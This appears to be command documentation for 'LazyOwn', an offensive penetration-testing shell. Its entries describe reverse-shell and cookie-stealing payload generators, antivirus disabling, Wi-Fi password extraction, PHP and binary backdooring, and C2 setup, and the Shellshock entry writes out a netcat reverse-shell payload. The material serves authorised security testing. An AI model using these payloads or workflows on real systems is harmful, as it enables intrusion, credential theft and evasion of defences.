Complete mode options and file paths for the sessions/hash.txt


Runs Responder on a specified network interface with elevated privileges.

This function executes the Responder tool with sudo on the network interface provided in the device parameter.

Usage: responder

:param line: This parameter is not used in the function but is included for consistency with other command methods. :type line: str :returns: None

Manual execution: 1. The command sudo responder -I <device> is executed, where <device> is the network interface specified by the user.

Dependencies: - The function relies on sudo to run Responder with root privileges. - Ensure that Responder is installed and available in the system’s PATH.

Example: responder # If device is set to tun0, the command executed will be sudo responder -I tun0.

Note: - Ensure that the device parameter is set before calling this function. - Replace <device> with the appropriate network interface, such as tun0, eth0, etc. - Running Responder requires root privileges, so make sure the user running the command has the necessary permissions.


Displays IP addresses of network interfaces and copies the IP address from the tun0 interface to the clipboard.

This function performs the following tasks: 1. Displays IP addresses for all network interfaces using ip a show scope global and awk. 2. Copies the IP address from the tun0 interface to the clipboard using xclip.

Usage: ip

:param line: This parameter is not used in the function but is included for consistency with other command methods. :type line: str :returns: None

Manual execution: 1. The command ip a show scope global | awk '/^[0-9]+:/ { sub(/:/,"",$2); iface=$2 } /^[[:space:]]*inet / { split($2, a, "/"); print " [" iface"] "a[1] }' is executed to display the IP addresses of all network interfaces. 2. The IP address of the tun0 interface is copied to the clipboard using the command ip a show tun0 | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1 | xclip -sel clip.

Dependencies: - The function relies on awk, grep, cut, and xclip to process and copy the IP address.

Example: ip # This will display IP addresses for all network interfaces and copy the IP address from tun0 to the clipboard.

Note: Ensure that the tun0 interface exists and has an IP address assigned. If tun0 is not present or has no IP address, the clipboard will not be updated.


Displays IP addresses of network interfaces and prints the IP address from the tun0 interface.

This function performs the following tasks: 1. Displays IP addresses for all network interfaces using ip a show scope global and awk. 2. Prints the IP address from the tun0 interface.

Usage: ip

:param line: This parameter is not used in the function but is included for consistency with other command methods. :type line: str :returns: None

Manual execution: 1. The command ip a show scope global | awk '/^[0-9]+:/ { sub(/:/,"",$2); iface=$2 } /^[[:space:]]*inet / { split($2, a, "/"); print " [" iface"] "a[1] }' is executed to display the IP addresses of all network interfaces. 2. The IP address of the tun0 interface is printed to the console using the command ip a show tun0 | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1.

Dependencies: - The function relies on awk, grep, cut, and xclip to process and display the IP address.

Example: ip # This will display IP addresses for all network interfaces and print the IP address from tun0.

Note: Ensure that the tun0 interface exists and has an IP address assigned. If tun0 is not present or has no IP address, the address will not be displayed.


Copies the remote host (rhost) to the clipboard and updates the command prompt.

This function performs two tasks: 1. It copies the rhost parameter to the clipboard if it is valid. 2. It updates the command prompt to include the rhost and the current working directory.

Usage: rhost [clean]

:param line: An optional argument that determines the behavior of the function: - If ‘clean’, it resets the command prompt to its default format. - If any other value, it updates the command prompt to include the rhost and current working directory. :type line: str :returns: None

Manual execution: 1. If line is ‘clean’: - The command prompt is reset to its default format. 2. If line is any other value: - The command prompt is updated to show the rhost and the current working directory. - The rhost is copied to the clipboard using xclip.

Dependencies: - The script uses xclip to copy the rhost to the clipboard.

Example: rhost # This will copy the current rhost to the clipboard and update the prompt.

rhost clean # This will reset the command prompt to its default format.

Note: Ensure that the rhost is valid by checking it with the check_rhost function before copying it to the clipboard.


Updates the command prompt to include the remote host (rhost) and current working directory.

This function performs two tasks: 1. It updates the command prompt to include the rhost and the current working directory if line is not ‘clean’. 2. It resets the command prompt to its default format if line is ‘clean’.

Usage: rhost [clean]

:param line: An optional argument that determines the behavior of the function: - If ‘clean’, it resets the command prompt to its default format. - If any other value, it updates the command prompt to include the rhost and current working directory. :type line: str :returns: None

Manual execution: 1. If line is ‘clean’: - The command prompt is reset to its default format. 2. If line is any other value: - The command prompt is updated to show the rhost and the current working directory.

Example: rhost # This will update the command prompt to include the rhost and current working directory.

rhost clean # This will reset the command prompt to its default format.

Note: Ensure that the rhost is valid by checking it with the check_rhost function before updating the prompt.

Show the banner


Copies a Python reverse shell command to the clipboard.

This function generates a Python command that uses the pty module to spawn a new shell and copies it to the clipboard. This is typically used for creating a TTY shell in a reverse shell situation.

Usage: py3ttyup

:param line: This parameter is not used in the function. :type line: str :returns: None

Manual execution: 1. The function creates a Python command with pty.spawn to open a shell. 2. The command is copied to the clipboard using xclip. 3. A message is printed to inform the user that the command has been copied.

Dependencies: - The script uses xclip to copy the command to the clipboard.

Example: py3ttyup # This will copy the Python command python3 -c 'import pty; pty.spawn("/bin/bash")' to the clipboard.

Note: This command is often used in scenarios where you need a more interactive shell from a reverse shell connection.


Copies a reverse shell payload to the clipboard.

This function generates a reverse shell command that connects back to the specified host and port, and copies it to the clipboard. It also provides a way to execute the payload via a PHP-based web shell.

Usage: rev

:param line: This parameter is not used in the function. :type line: str :returns: None

Manual execution: 1. Ensure that lhost, lport, and rhost parameters are set. 2. The function generates a reverse shell command in Bash and prints instructions for using the payload. 3. It also provides an example URL and PHP code snippet that decodes and executes the base64-encoded payload. 4. The reverse shell command is copied to the clipboard using xclip.

Dependencies: - The script uses xclip to copy the command to the clipboard. - Base64 encoding is used to obfuscate the payload.

Example: rev # This will copy a reverse shell command to the clipboard and display instructions for its use.


Copies a malicious image tag payload to the clipboard.

This function crafts and copies two different image tag payloads designed to steal cookies from a target’s browser. The payloads use JavaScript to send cookies to a specified host and port. The user is prompted to select which payload to copy to the clipboard.

Usage: img2cookie

:param line: This parameter is not used in the function. :type line: str :returns: None

Manual execution: 1. Ensure that lhost, lport, and rhost parameters are set. 2. The function generates two payloads: - Payload 1: A script that sends cookies to the specified host and port. - Payload 2: An image tag with an onerror event that fetches cookies and sends them to the specified host and port using Base64 encoding. 3. The user is prompted to choose between the two payloads, which are then copied to the clipboard.

Dependencies: - The script uses xclip to copy the payloads to the clipboard. - Ensure that lhost, lport, and rhost parameters are set with appropriate values.

Example: img2cookie # This will prompt you to select between two payloads. The chosen payload will be copied to the clipboard.


Creates a Visual Basic Script (VBS) to attempt to disable antivirus settings.

This function generates a VBS script designed to modify Windows Registry settings and run PowerShell commands to disable various Windows Defender antivirus features.

Usage: disableav

:param line: This parameter is not used in the function. :type line: str :returns: None

Manual execution: 1. The function writes a VBS script to a file named aav.vbs in the sessions directory. 2. The script: - Elevates its privileges if not already running as an administrator. - Modifies Windows Registry settings to disable various Windows Defender features. - Outputs PowerShell commands to disable additional Windows Defender settings.

The VBS script: - Uses WScript.Shell to modify the Windows Registry for disabling Windows Defender. - Calls PowerShell commands to further disable antivirus features.

Dependencies: - The script must be executed on a Windows system where you have administrative privileges. - Ensure you have appropriate permissions to modify Windows Registry settings.

Example: disableav # This will create the aav.vbs file with the specified content in the sessions directory.


Downloads ConPtyShell and prepares a PowerShell command for remote access.

This function downloads the ConPtyShell PowerShell script and ZIP archive to the sessions directory and copies a PowerShell command to the clipboard for easy execution.

Usage: conptyshell

:param line: This parameter is not used in the function. The required host and port are retrieved from the params dictionary. :type line: str :returns: None

Manual execution: 1. Ensure that the lhost and lport parameters are set with the local host and port for the reverse shell. 2. The function downloads Invoke-ConPtyShell.ps1 and ConPtyShell.zip to the sessions directory. 3. Constructs a PowerShell command to run Invoke-ConPtyShell.ps1 with the specified local IP and port. 4. Copies the constructed command to the clipboard using xclip.

The constructed PowerShell command: - Uses Invoke-ConPtyShell.ps1 to establish a reverse shell connection to the specified lhost and lport. - Sets the PowerShell execution policy to bypass and specifies the dimensions of the terminal window.

Dependencies: - wget: For downloading files from the internet. - xclip: For copying commands to the clipboard. - Ensure ConPtyShell script and ZIP are compatible with your environment.

Example: conptyshell # This will download the required files and copy the PowerShell command to the clipboard.


Runs pwncat-cs with the specified port for listening.

This function starts a pwncat-cs listener on the specified local port. It can use a port defined in the lport parameter or a port provided as an argument.

Usage: pwncatcs

:param line: The port number to use for the pwncat-cs listener. If not provided, it defaults to the lport parameter. :type line: str :returns: None

Manual execution: 1. Ensure that pwncat-cs is installed and accessible from your command line. 2. The port number can either be provided as an argument or be set in the lport parameter of the function. 3. Run the function to start pwncat-cs on the specified port.

If no port is provided as an argument, the function will use the port specified in the lport parameter. If a port is provided, it overrides the lport value.

After starting the listener, the function prints a message indicating that pwncat-cs is running on the specified port and another message when the session is closed.

Dependencies: - pwncat-cs: A tool used for creating reverse shells or bind shells.


Automates command execution based on a list of aliases and commands.

  1. Displays available aliases and their commands.
  2. Asks the user if they want to execute a specific command.
  3. If confirmed, displays the alias and command with a number.
  4. Executes the command and copies it to the clipboard.

:param line: The command line input containing the list of alias and command pairs. :type line: str :returns: None

Manual execution: To manually run these tasks, you would need to: - Prepare the list of alias and command pairs in the format: “alias command”. - Provide this list as input to the function. - Confirm the execution of the desired command when prompted. - Manually copy the command to the clipboard if needed.

Note: Ensure xclip is installed and properly configured to use clipboard functionalities.


Executes a shell command directly from the LazyOwn interface.

This function allows the user to execute arbitrary shell commands without exiting the LazyOwn shell. It checks if a command is provided, prints a message indicating the command being executed, and then runs the command using os.system.

Usage: sh

:param line: The shell command to be executed. :type line: str :raises ValueError: If no command is provided, an error message is printed indicating that a command is required. :returns: None

Example: sh ls -la # This will execute ‘ls -la’ in the shell without exiting LazyOwn.

Note: Ensure that the command provided is safe to execute and does not include potentially harmful operations.


Displays the current working directory and lists files, and copies the current directory path to the clipboard.

This function performs the following tasks: 1. Displays the current working directory with pwd and lists files in the directory using ls. 2. Copies the current directory path to the clipboard using xclip.

Usage: pwd

:param line: This parameter is not used in the function but is included for consistency with other command methods. :type line: str :returns: None

Manual execution: 1. The command echo -e "[\e[96m\pwd`is retrieved and used to construct theskipfishcommand. 5. If the URL is not configured and an attempt is made to use the 'url' option, an error message is printed, and the function exits. 6. The constructedskipfishcommand is displayed on the console and executed usingos.system`.

Note: - The function assumes that the skipfish tool is installed on the system. - The output of the scan is saved in the directory sessions/{rhost}/skipfish/. - The wordlist used by Skipfish is specified in wordlist.


Create a Windows DLL file using MinGW-w64 or a Blazor DLL for Linux.

This function prompts the user to select between creating a 32-bit DLL, a 64-bit DLL, or a Linux Blazor DLL. It first checks if MinGW-w64 is installed; if not, it attempts to install it. The user must provide a filename for the DLL, which will be created from the sessions/rev.c source file. The function constructs the appropriate command to compile the DLL based on the user’s choice and executes it. If the user selects a 32-bit or 64-bit compilation, the function also opens the rev.c file in a text editor for modifications before compilation. For option 3, it executes a script to create a Blazor DLL using the local host (lhost) address to download the necessary payload.

Parameters: - line (str): The name of the DLL file to be created. Must be provided by the user.

Usage: - Choose “1” for 32-bit, “2” for 64-bit, or “3” for creating a Linux Blazor DLL. - Ensure that shellcode is created beforehand using the lazymsfvenom or venom options 13 or 14 to replace in sessions/rev.c.


Performs a web seo fingerprinting scan using lazyseo.py.

  1. Executes the lazyseo.py command to identify h1,h2,links,etc used by the target web application.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target web host to be scanned, specified in the params dictionary.

:returns: None

Manual execution: To manually perform web seo fingerprinting, use the following command: lazyseo.py

Replace <target_host> with the URL or IP address of the web application you want to scan.

For example: lazyseo.py example.com


Execute the PadBuster command for padding oracle attacks.

This function constructs and executes a PadBuster command to perform a padding oracle attack on the specified URL. It requires the user to provide a URL, a cookie with a hash, a plaintext value to compare, and a specific byte position to attack.

Parameters: - line (str): The input line containing the cookie, plaintext, and byte position. Expected format: ‘cookie= plaintext ’.

Functionality: - The function first checks if a URL is set in the parameters. - It then validates that the correct number of arguments is provided. - If the arguments are valid, it constructs the PadBuster command and executes it. - The command is also copied to the clipboard for convenience.

Usage Example: - set url http://target.com - padbuster auth= user=admin 8


Scans for hosts with SMB service open on port 445 in the specified target network.

This function performs the following actions: 1. Scans the specified subnet for hosts with an open SMB port (445). 2. Sets up a Metasploit handler to listen for reverse connections. 3. Attempts to exploit the Conficker vulnerability on each identified host. 4. Optionally conducts a brute-force attack on SMB using the provided password file.

Parameters: line (str): The command line input for the smbattack function, though not used directly in this implementation.

Returns: None


Automates the exploitation of the Cacti version 1.2.26 vulnerability using the multi/http/cacti_package_import_rce exploit.

This function performs the following actions: 1. Sets up a Metasploit handler to listen for reverse connections. 2. Attempts to log in to the Cacti instance with provided credentials. 3. Checks if the target is vulnerable and uploads the malicious payload. 4. Triggers the payload to obtain a Meterpreter session.

Parameters: line (str): The command line input for the cacti exploit function, though used directly in this implementation to set password.

Returns: None


Handles the creation of temporary files for users and passwords based on a small dictionary.

This function prompts the user to decide whether to use a small dictionary for generating user and password lists. If the user agrees, it loads the credentials from a JSON file and writes them into temporary files. If the user declines, the process is aborted.

Parameters: list (str): Not used in this function, but kept for compatibility with cmd command input.

Returns: None


Set up and run ngrok on a specified local port. If ngrok is not installed, it will automatically be installed. The user will be prompted to provide their ngrok authentication token to complete the setup.

Args: line (str): The input line, though it’s not directly used in this function.

Workflow: 1. Check if the local port specified in self.params["lport"] is valid. 2. Verify if ngrok is installed. If not, proceed with installation. 3. After installation, prompt the user to authenticate ngrok using their token. 4. Once authenticated, run ngrok to expose the specified local port.

Note: The ngrok authentication token can be obtained from the ngrok dashboard.


This function generates a PowerShell script that retrieves saved Wi-Fi passwords on a Windows system. The script gathers the Wi-Fi profiles, extracts their passwords, and saves the information in a text file named ‘wifi_passwords.txt’ in the directory where the script is executed. The generated PowerShell command is copied to the clipboard for easy execution.

Parameters: line (str): This parameter is not used within the function but is required for the command interface.

The function does not return any value.


Executes a Shellshock attack against a target.

This function constructs and sends a specially crafted HTTP request designed to exploit the Shellshock vulnerability on a target server. The payload is embedded in the ‘User-Agent’ header, and when executed, it will open a reverse shell connection to the attacker’s machine.

Parameters: - lport: Local port for the reverse shell connection, retrieved from self.params. - lhost: Local host for the reverse shell connection, retrieved from self.params.

The function first validates the local host (lhost) and local port (lport) using check_lhost() and check_lport(). If either validation fails, the function returns without proceeding.

If the validation passes, the payload is created using the format: ‘() { :; }; /bin/bash -c “nc -v {rhost} {lport} -e /bin/bash -i”’, where rhost is the remote target’s IP address and lport is the specified local port.

The function then attempts to send a GET request to the target URL (args.target) with the crafted payload in the ‘User-Agent’ header. The server’s response is captured and printed using print_msg().

If any error occurs during the request, an error message is displayed using print_error().

Returns: None


This function generates a PowerShell script that retrieves reverse shell over http on a Windows system. The script generated PowerShell reverse shell to execute command by curl command is copied to the clipboard for easy execution.

Parameters: line (str): This parameter is used to get the port to create the listener

The function does not return any value. Example of use: curl -X POST http://victim:8080/ -d “Get-Process”


Interactive Morse Code Converter.

This function serves as an interface for converting text to Morse code and vice versa. It provides a menu with the following options:

1️⃣ Convert text to Morse code. 2️⃣ Convert Morse code to text. 0️⃣ Exit the program.

When the function is called, it runs an external script (morse.py) that handles the conversion processes. The function also manages keyboard interruptions gracefully, allowing the user to exit the program cleanly.

Arguments: line (str): This argument is reserved for future enhancements but is currently not used.

Returns: None

Notes: - Ensure that the morse.py module is located in the modules directory and is executable. - The function captures KeyboardInterrupt to allow safe exit from the Morse code converter.

Example: >>> do_morse(““)

See Also: - morse.py: The script that contains the logic for Morse code conversions.


Fetch URLs from the Wayback Machine for a given website. The URL is taken from line. If the URL is not provided, an error is printed. The limit of results is taken from self.params[“limit”] if provided; otherwise, defaults to 10. Results are printed directly to the console.


Handles the execution of a C2 (Command and Control) server setup command.

This function performs the following tasks: 1. Retrieves and validates the local host (lhost) and local port (lport) parameters. 2. Checks if the required file modules/run exists. 3. Reads the content of the modules/run file, replaces placeholders with actual values (lport, line, lhost), and copies the updated content to the clipboard. 4. Prompts the user to start the C2 server, and if confirmed, executes the server command. 5. Provides a warning about shutting down the server.

Args: line (str): The victim ID or command line to be used by the C2 server.

Returns: None

Raises: None

Example: c2 victim-1

Notes: - Ensure that the lhost and lport parameters are valid before calling this function. - The modules/run file must exist and be correctly formatted. - The server command is executed using os.system, which may require additional handling for security.


Handles the process of sending a spoofed ARP packet to a specified IP address with a given MAC address.

This function performs the following steps: 1. Executes a command to list current ARP entries and prints the IP and MAC addresses. 2. Prompts the user to input the target IP and MAC address in a specified format. 3. Parses the provided input to extract the IP and MAC addresses. 4. Sets up default values for the gateway IP, local MAC address, and network interface. 5. Creates an ARP packet with the specified target IP and MAC address. 6. Sends the ARP packet using the specified network interface. 7. Prints a confirmation message indicating that the spoofing packet has been sent.

Args: line (str): Input line for the command, which is not used directly in this function.

Raises: Exception: If any error occurs during the execution of the function.


Asks the user for the URL, database, table, and columns, and then executes the Python script ‘modules/lazybsqli.py’ with the provided parameters.

Parameters: - def_func: Function to execute (not used in this example). - line: Command line or additional input (not used in this example).

Example: - do_bsqli(None, None)


Generates an SSH key pair with RSA 4096-bit encryption. If no name is provided, it uses ‘lazyown’ by default. The keys are stored in the ‘sessions/’ directory.

Parameters: - line: The name of the key file. If empty, ‘lazyown’ is used as the default.

Example: - do_sshkey(None) # Generates ‘lazyown’ key - do_sshkey(“custom_key”) # Generates ‘custom_key’ key


Generate a custom dictionary using the crunch tool.

This function creates a wordlist with a specified length using the crunch command. It allows the user to specify a custom character pattern for the wordlist.

:param line: The length of the strings to be generated (e.g., ‘6’ for 6-character strings). If not provided, the function will prompt an error message.

:returns: None

Example usage: >>> crunch 6 This will generate a wordlist with all possible combinations of 6-character strings using the default pattern.

Additional notes: - If no custom pattern is provided, the function uses a default pattern: “0123456789abcdefghijklmnñopqrstuvxyz,.-#$%@” - The output is saved in the sessions/ directory with the filename format dict_<length>.txt


Fetches and displays malware information from the MalwareBazaar API based on the given tag.

Args: line (str): The tag used to query the MalwareBazaar API.

This function performs the following steps: 1. Constructs a URL to query the MalwareBazaar API with the provided tag. 2. Uses curl to send a POST request to the API and saves the response in a JSON file. 3. Checks if the file was successfully created and exists. 4. Loads the JSON data from the file. 5. Checks the query_status field to determine if there are results. - If no_results, prints a warning message and exits the function. 6. Iterates through the list of file information provided in the response. - Prints detailed information about each file, including: - File name - File type - File size - Hashes (SHA-256, SHA-1, MD5) - First seen date - Signature - Tags - ClamAV results (if any) - Downloads and uploads count 7. Deletes the temporary file used to store the API response.

Returns: None


Download a malware sample from MalwareBazaar using its SHA256 hash.

This function allows the user to download a malware sample from MalwareBazaar by providing the SHA256 hash of the desired file. If the hash is not provided as an argument, the function will prompt an error message indicating the correct usage. The downloaded malware sample will be saved as a zipped file (malware.zip) and will be password protected.

Arguments: line (str): The SHA256 hash of the malware sample to be downloaded.

Returns: None

Example: >>> download_malwarebazar 094fd325049b8a9cf6d3e5ef2a6d4cc6a567d7d49c35f8bb8dd9e3c6acf3d78d

Notes: - Ensure that the SHA256 hash provided is correct and that it corresponds to a file available on MalwareBazaar. - The downloaded file will be password protected using the password “infected”. - To obtain the SHA256 hash of malware samples, refer to the help malwarebazar command.

See Also: - run(command): Utility function used to execute the command for downloading the malware.


Run an SSL scan on the specified remote host.

This function initiates an SSL scan on a specified remote host (rhost) using the sslscan-singleip.sh script. If a specific port is provided in the line argument, the scan will target that port; otherwise, it will scan all available ports.

Parameters: line (str): The port number to scan (optional). If omitted, the scan will target all ports.

Internal Variables: rhost (str): The remote host IP address or hostname extracted from the params attribute.

Returns: None

Example Usage: - To scan all ports on the specified rhost: sslscan - To scan a specific port (e.g., port 443) on rhost: sslscan 443

Note: - The check_rhost() function is used to validate the rhost before running the scan. - The sslscan-singleip.sh script must be present in the sessions directory.


This function constructs and executes a command for the ‘cewl’ tool. It first checks if the ‘url’ parameter is set. If not, it prints an error message. If the ‘url’ is set, it extracts the domain from the URL using the get_domain function. Then, it constructs a ‘cewl’ command with the specified parameters and prepares it for execution.

Scan to a depth of 2 (-d 2) and use a minimum word length of 5 (-m 5), save the words to a file (-w docswords.txt), targeting the given URL (https://example.com):

Parameters: line (str): The command line input for this function.

Expected self.params keys: - url (str): The URL to be used for the ‘cewl’ command.

Example usage: - set url http://example.com - do_cewl


This function constructs and executes a command for the ‘dmitry’ tool. It first checks if the ‘url’ parameter is set. If not, it prints an error message. If the ‘url’ is set, it extracts the domain from the URL using the get_domain function. Then, it constructs a ‘dmitry’ command with the specified parameters and prepares it for execution.

Run a domain whois lookup (w), an IP whois lookup (i), retrieve Netcraft info (n), search for subdomains (s), search for email addresses (e), do a TCP port scan (p), and save the output to example.txt (o) for the domain example.com:

Parameters: line (str): The command line input for this function.

Expected self.params keys: - url (str): The URL to be used for the ‘dmitry’ command.

Example usage: - set url http://example.com - do_dmitry


Executes the graudit command to perform a static code analysis with the specified options.

This function runs the ‘graudit’ tool with the ‘-A’ option for an advanced scan and the ‘-i sessions’ option to include session files. The results will be displayed directly in the terminal.

Args: line (str): Input line from the command interface. This argument is currently not used within the function but is required for the command interface structure.

Example: To run this function from the command interface, simply type ‘graudit’ and press enter. The function will execute the ‘graudit -A -i sessions’ command.

Note: Ensure that ‘graudit’ is installed and properly configured in your system’s PATH for this function to work correctly.


Connects to the msfrpcd daemon and allows remote control of Metasploit.

Usage: msfrpc -a -p -U -P [-S]

This command will prompt the user for necessary information to connect to msfrpcd.


Executes a Nuclei scan on a specified target URL or host.

Usage: nuclei -u [-o ] [other options]

If a URL is provided as an argument, it will be used as the target for the scan. Otherwise, it will use the target specified in self.params[“rhost”].


Executes a parsero scan on a specified target URL or host.

Usage: parsero -u [-o ] [other options]

If a URL is provided as an argument, it will be used as the target for the scan. Otherwise, it will use the target specified in self.params[“rhost”].


Executes the Sherlock tool to find usernames across social networks.

This function takes a username as an argument and runs the Sherlock tool to check for the username’s presence on various social networks. The results are saved in CSV format in the sessions directory.

Parameters: line (str): The username to be checked by Sherlock. If not provided, an error message is printed and the function returns.

Returns: None

Raises: None

Example: >>> do_sherlock(“example_user”) Running command: sherlock example_user –local -v –csv –print-found

Additional Notes: - The Sherlock tool must be installed and available in the system path. - The results are saved in the sessions directory as a CSV file. - The --local flag forces the use of a local data.json file, which should be present in the appropriate directory.


Executes trufflehog to search for secrets in a given Git repository URL. If trufflehog is not installed, it installs the tool automatically. This function navigates to the ‘sessions’ directory and runs trufflehog with the provided Git URL, outputting the results in JSON format.

Args: line (str): The Git repository URL to scan for secrets.

Returns: None

Raises: None

Example: trufflehog https://github.com/user/repo.git

Notes: - Ensure that trufflehog is installed or it will be installed automatically. - The output of the trufflehog scan is printed and executed in the ‘sessions’ directory.


Generate a PHP backdoor using Weevely, protected with the given password.

This function generates a PHP backdoor file using the specified password. It ensures that Weevely is installed on the system before attempting to generate the backdoor. If Weevely is not present, it will be installed automatically.

Usage: ┌─[LazyOwn👽 ~/LazyOwn][][http://victim.local/] └╼ $ weevelygen s3cr3t

Parameters: line (str): The password to protect the generated PHP backdoor.

Returns: None

Raises: print_error: If the password argument is not provided. print_warn: If Weevely is not installed and needs to be installed.

Example: To generate a PHP backdoor protected with the password ‘s3cr3t’, use the following command: $ weevelygen s3cr3t


Connect to PHP backdoor using Weevely, protected with the given password.

This function Connect to PHP backdoor file using the specified password. It ensures that Weevely is installed on the system before attempting to generate the backdoor. If Weevely is not present, it will be installed automatically.

Usage: ┌─[LazyOwn👽 ~/LazyOwn][][http://victim.local/] └╼ $ weevely http://victim.local/weevely.php s3cr3t

Parameters: line (str): the url to Weevely shell and the password to protect the generated PHP backdoor.

Returns: None

Raises: print_error: If the password argument is not provided. print_warn: If Weevely is not installed and needs to be installed.

Example: To generate a PHP backdoor protected with the password ‘s3cr3t’, use the following command: $ weevelygen s3cr3t


Executes a changeme scan on a specified target URL or host.

Usage: changeme [-o ] –oa -t 20 rhost

If a URL is provided as an argument, it will be used as the target for the scan. Otherwise, it will use the target specified in self.params[“rhost”].


Performs enumeration of information from a target system using enum4linux-ng.

  1. Executes the enum4linux-ng command with the -A option to gather extensive information from the specified target.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target host for enumeration, specified in the params dictionary.

:returns: None

Manual execution: To manually enumerate information from a system, use the following command: enum4linu-ng -A

Replace <target_host> with the IP address or hostname of the target system.

For example: enum4linux-ng -A


Executes a web server fuzzing script with user-provided parameters.

This function prompts the user for the necessary parameters to run the fuzzing script, including the target IP, port, HTTP method, directory, file extension, and expected status codes.

Usage: fuzzing

Parameters: line (str): The command line input for the function (not used directly in the current implementation).

Returns: None

Example: To run the fuzzing script, enter the required parameters when prompted by the function.


Executes a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS, and WSF.

Usage: sharpshooter [-o ] –oa -t 20 rhost

This function installs SharpShooter if it is not already installed, prompts the user for the payload type, and then runs SharpShooter to create a payload based on the specified type.

Parameters: line (str): The command line input for the function (not used directly in the current implementation).

Returns: None

Example: To create a payload using SharpShooter, ensure you have already generated shellcode using lazymsfvenom or venom, and then run this function to specify the payload type and generate the final payload file.


Starts the Sliver server and generates a client configuration file for connecting clients. Provides options to download the Sliver client for Windows, Linux, or macOS.

Usage: sliver-server [flags] sliver-client command

This function installs Sliver if it is not already installed, starts the Sliver server, generates the necessary certificates, and creates a client configuration file. It also provides options to download the client for different operating systems.

Parameters: line (str): The command line input for the function (not used directly in the current implementation).

Returns: None

Example: To start the Sliver server, generate the necessary certificates, and download the client, run this function. Choose the appropriate client download option based on the operating system.


Generates a certificate authority (CA), client certificate, and client key.

Returns: str: Paths to the generated CA certificate, client certificate, and client key.


Executes the Kerbrute tool to enumerate user accounts against a specified target domain controller.

This function performs the following actions: 1. Retrieves necessary parameters such as the target URL and remote host (rhost). 2. Determines the domain based on the provided URL. 3. Validates the remote host address. 4. Constructs and executes the Kerbrute command to enumerate user accounts, saving the results in the sessions/users.txt file.

Parameters: line (str): Specify ‘pass’ to use credentials from ‘credentials.txt’ for password spraying, ‘brute’ to brute force using ‘users.txt’ and the RockYou wordlist, or leave empty for default behavior.

Returns: None

Example: To enumerate user accounts using Kerbrute, ensure Kerbrute is in your path, then run this function to perform the enumeration.

Note: - The function assumes that the Kerbrute binary (kerbrute_linux_amd64) is present in the system’s PATH. - The file sessions/users.txt should exist and contain the list of usernames to enumerate.


Execute the dacledit.py command for a specific user or all users listed in the users.txt file.

This function interacts with the DACL editor to modify access control lists in an Active Directory environment. It allows the user to select a specific user from the list or execute the command for all users. Install impacket suit to get this script in the examples Args: line (str): The organizational unit (OU) in the format ‘OU=EXAMPLE,DC=DOMAIN,DC=EXT’. If not provided, the user is prompted to enter it.

Returns: None

Workflow: 1. Extract parameters and set up paths. 2. Check the reachability of the remote host. 3. Prompt the user for an OU if not provided. 4. Check if the users.txt file exists and read the list of users. 5. Display the list of users and prompt the user to select a specific user. 6. Execute the dacledit.py command for the selected user or all users.

Raises: FileNotFoundError: If the users.txt file does not exist.

Example: To execute the command for a specific user: >>> do_dacledit(“MARKETING DIGITAL”)

To execute the command for all users: >>> do_dacledit(““)


Execute the bloodyAD.py command for a specific user or all users listed in the users.txt file.

This function interacts with BloodyAD to add users to a group in an Active Directory environment. It allows the user to select a specific user from the list or execute the command for all users. (use download_external option 48 to clone the repo) Args: line (str): The organizational unit (OU) in the format ‘CN=EXAMPLE,DC=DOMAIN,DC=EXT’. If not provided, the user is prompted to enter it.

Returns: None

Workflow: 1. Extract parameters and set up paths. 2. Check the reachability of the remote host. 3. Prompt the user for a CN if not provided. 4. Check if the users.txt file exists and read the list of users. 5. Display the list of users and prompt the user to select a specific user. 6. Execute the bloodyAD.py command for the selected user or all users.

Raises: FileNotFoundError: If the users.txt file does not exist.

Example: To execute the command for a specific user: >>> do_bloodyAD(““)

To execute the command for all users: >>> do_bloodyAD(““)


Executes the Evil-WinRM tool to attempt authentication against the specified target.

This function performs the following actions: 1. Checks if the provided target host (rhost) is valid. 2. If the line argument is “pass”, it reads credentials from the credentials.txt file and attempts authentication for each user-password pair using Evil-WinRM. 3. If line is not “pass”, it prints an error message indicating the correct usage.

Parameters: line (str): A command argument to determine the action. If “pass”, the function reads credentials from the credentials.txt file and attempts to authenticate. If not “pass”, it prints an error message with usage instructions.

Returns: None


Requests a Ticket Granting Ticket (TGT) using the Impacket tool with provided credentials.

This function performs the following actions: 1. Checks if the provided target host (rhost) is valid. 2. Reads credentials from the credentials.txt file. 3. Uses each credential (username and password) to request a TGT with the Impacket tool. 4. Constructs and executes the Impacket command to obtain a TGT for each set of credentials.

Parameters: line (str): A command line argument, not used in this implementation.

Returns: None


Performs enumeration of users from a target system using apache-users.

  1. Executes the apache-users command with the -h option to specified target.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target host for enumeration, specified in the params dictionary.

:returns: None

Manual execution: To manually enumerate information from a system, use the following command: apache-users -h -l -p -s 0 -e 403 -t 10

Replace <target_host> with the IP address or hostname of the target system.

For example: apache-users -h -l /usr/share/wordlists/metasploit/unix_users.txt -p 80 -s 0 -e 403 -t 10


Creates a backdoored executable using backdoor-factory.

This function checks if backdoor-factory is installed, installs it if necessary, and then uses it to inject a reverse shell payload into a specified binary file. The binary is backdoored with a reverse shell payload that connects back to a specified host and port.

:param line: The absolute path to the file that will be backdoored. If not provided, the user is prompted to enter the path.

:returns: None

Manual execution: To manually create a backdoored executable, use the following command: backdoor-factory -f -H -P -s reverse_shell_tcp_inline -J -a -c -l 128 -o

Replace <file_path> with the path to the binary you want to backdoor, <lhost> with the IP address of the attacker’s machine, and <lport> with the port number to listen on. The <output_file> is the path where the backdoored binary will be saved.

For example: backdoor-factory -f /usr/share/windows-binaries/plink.exe -H -P 4444 -s reverse_shell_tcp_inline -J -a -c -l 128 -o sessions/backdoor_factory.exe


Tests WebDAV server configurations using davtest.

This function checks if davtest is installed and installs it if necessary. It then runs davtest to perform a WebDAV server test against a specified URL or the default URL configured in self.params.

:param line: The URL of the WebDAV server to test. If provided, it overrides the default URL. If not provided, the function uses the URL specified in self.params["rhost"].

:returns: None

Manual execution: To manually test a WebDAV server, use the following command: davtest –url

Replace <url> with the URL of the WebDAV server you want to test.

For example: davtest –url http://example.com/webdav


Generates payloads using MSFvenom Payload Creator (MSFPC).

This function checks if msfpc is installed and installs it if necessary. It then runs msfpc with the specified parameters to create a payload for penetration testing.

